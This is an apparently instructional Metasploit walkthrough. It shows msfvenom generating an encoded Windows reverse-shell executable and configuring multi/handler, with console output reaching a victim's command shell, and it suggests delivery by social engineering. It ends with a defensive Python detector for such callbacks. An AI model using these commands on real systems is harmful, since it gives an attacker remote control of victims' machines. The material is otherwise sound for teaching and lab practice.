Metasploit is full of interesting and useful features. One of them is the ability to generate an executable from a Metasploit payload. This is very useful in situations such as social engineering: if you can get a user to run your payload for you, there is no reason to go to the trouble of exploiting any software.
Let's look at a simple example. We will generate a reverse shell payload, execute it on a remote system, and get our shell. To do this we will use the command-line tool msfvenom. This command can generate payloads for use in many places and offers a variety of output options, from perl to C to raw. We are interested in the executable output provided by the -f exe option.
We will generate a Windows reverse shell executable that connects back to us on port 31337.
root@kali:~# msfvenom --payload-options -p windows/shell/reverse_tcp
Options for payload/windows/shell/reverse_tcp:

       Name: Windows Command Shell, Reverse TCP Stager
     Module: payload/windows/shell/reverse_tcp
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 281
       Rank: Normal

Provided by:
    spoonm
    sf
    hdm
    skape

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Spawn a piped command shell (staged). Connect back to the attacker

root@kali:~# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
Saved as: /tmp/1.exe
root@kali:~# file /tmp/1.exe
/tmp/1.exe: PE32 executable (GUI) Intel 80386, for MS Windows
Now we have a Windows executable ready to go. Next we will use multi/handler, which is a stub that handles exploits launched outside of the framework.
root@kali:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
When using the exploit/multi/handler module, we still need to tell it which payload to expect, so we configure it with the same settings as the executable we generated.
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LHOST 172.16.104.130
LHOST => 172.16.104.130
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) >
Now that everything is set up and ready to go, we run exploit in multi/handler and execute our generated executable on the victim.
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (172.16.104.130:31337 -> 172.16.104.128:1150)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Victim\My Documents>
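From the defender's side, the session above leaves a recognisable trace on the endpoint: a binary launched from a user-writable directory (here My Documents) that immediately opens an outbound connection to an unusual port (31337). The following Python is an added example, not part of this page or of Metasploit, that correlates constructed process-creation and network-connection events in a Sysmon-like shape and flags that pattern; the event field names, the directory markers and the port allowlist are assumptions to be tuned per environment.

```python
import re

# Constructed endpoint telemetry in a Sysmon-like shape (not real log data): the binary
# starts from My Documents and calls back on 31337; the browser lines are benign noise.
SAMPLE_LOG = """\
ProcessCreate pid=1532 image="C:\\Documents and Settings\\Victim\\My Documents\\1.exe" user=Victim
ProcessCreate pid=1540 image="C:\\Program Files\\Internet Explorer\\iexplore.exe" user=Victim
NetworkConnect pid=1540 dst=172.16.104.1 dport=80
NetworkConnect pid=1532 dst=172.16.104.130 dport=31337
NetworkConnect pid=1540 dst=172.16.104.1 dport=443
"""

USER_WRITABLE = ("\\documents and settings\\", "\\users\\", "\\temp\\")  # assumed markers
EXPECTED_PORTS = {53, 80, 88, 139, 389, 443, 445}  # assumed allowlist of normal egress ports

EVENT_RE = re.compile(r"(?P<ev>\w+)\s+pid=(?P<pid>\d+)\s+(?P<rest>.*)")
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Split one line into (event type, pid, {field: value}); None if malformed."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    fields = {k: (quoted or bare) for k, quoted, bare in FIELD_RE.findall(m.group("rest"))}
    return m.group("ev"), int(m.group("pid")), fields


def find_suspicious_callbacks(log_text):
    """Correlate ProcessCreate with NetworkConnect by pid; return (pid, image, dst, dport)
    for connections from a user-writable image path to a port outside EXPECTED_PORTS."""
    images = {}   # pid -> image path recorded at process creation
    hits = []
    for line in log_text.splitlines():
        rec = parse_event(line)
        if rec is None:
            continue
        ev, pid, f = rec
        if ev == "ProcessCreate":
            images[pid] = f.get("image", "")
        elif ev == "NetworkConnect" and "dport" in f:
            image = images.get(pid, "")
            port = int(f["dport"])
            if any(tag in image.lower() for tag in USER_WRITABLE) and port not in EXPECTED_PORTS:
                hits.append((pid, image, f.get("dst", ""), port))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_callbacks(SAMPLE_LOG):
        print("suspicious callback:", hit)
```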